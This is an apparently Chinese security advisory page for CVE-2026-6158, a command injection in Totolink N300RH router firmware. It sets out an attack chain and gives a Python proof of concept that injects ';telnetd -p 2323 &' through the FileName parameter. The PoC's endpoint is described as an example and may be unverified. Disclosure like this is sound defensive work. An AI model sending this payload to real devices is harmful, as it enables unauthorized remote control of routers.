IPBUF安全漏洞报告
English
CVE-2026-6158 CVSS 7.3 高危

CVE-2026-6158 Totolink N300RH操作系统命令注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6158
漏洞类型
操作系统命令注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink N300RH

相关标签

命令注入RCEIoTTotolink路由器

漏洞概述

Totolink N300RH路由器在6.1c.1353_B20190305版本中存在严重的操作系统命令注入漏洞。该漏洞位于upgrade.so文件的setUpgradeUboot函数中,由于对FileName参数缺乏严格的过滤,攻击者无需身份认证即可远程执行任意系统命令,可能导致设备被完全控制。

技术细节

该漏洞源于Totolink N300RH固件upgrade.so库文件中的setUpgradeUboot函数。在处理固件升级请求时,该函数直接从HTTP请求中提取FileName参数,并将其传递给系统底层命令执行,而未经过任何有效的安全过滤或转义。攻击者可以通过构造恶意的HTTP请求包,在FileName参数中注入Shell元字符(如; | &)。由于该漏洞无需用户交互且无需身份认证(PR:N),攻击者可通过网络向目标设备发送特制数据包,从而触发命令注入,最终在设备上执行任意操作系统命令。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出运行固件版本为6.1c.1353_B20190305的Totolink N300RH路由器设备。
STEP 2
2. 构造攻击载荷
攻击者编制包含恶意Shell命令(如反弹Shell或开启Telnet)的字符串,并将其置于HTTP请求的FileName参数中。
STEP 3
3. 发送恶意请求
攻击者向目标设备的Web管理接口发送包含恶意FileName参数的POST请求,触发setUpgradeUboot函数。
STEP 4
4. 执行命令
由于未对参数进行过滤,底层系统执行了注入的恶意命令,攻击者成功获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example based on vulnerability description) target_url = "http://<TARGET_IP>/boaform/formUpgradeUboot" # Malicious payload to inject command (e.g., telnetd or reboot) # The vulnerability is in the 'FileName' parameter payload = ";telnetd -p 2323 &" data = { "FileName": payload } try: response = requests.post(target_url, data=data, timeout=5) print(f"Status Code: {response.status_code}") print("Payload sent. Check if telnet started on port 2323.") except Exception as e: print(f"Error: {e}")

影响范围

Totolink N300RH 6.1c.1353_B20190305

防御指南

临时缓解措施
建议立即升级至官方最新固件版本。若无法及时升级,应将设备置于防火墙后,禁止从互联网访问设备的管理端口(如80/443),并限制内网对管理接口的访问权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表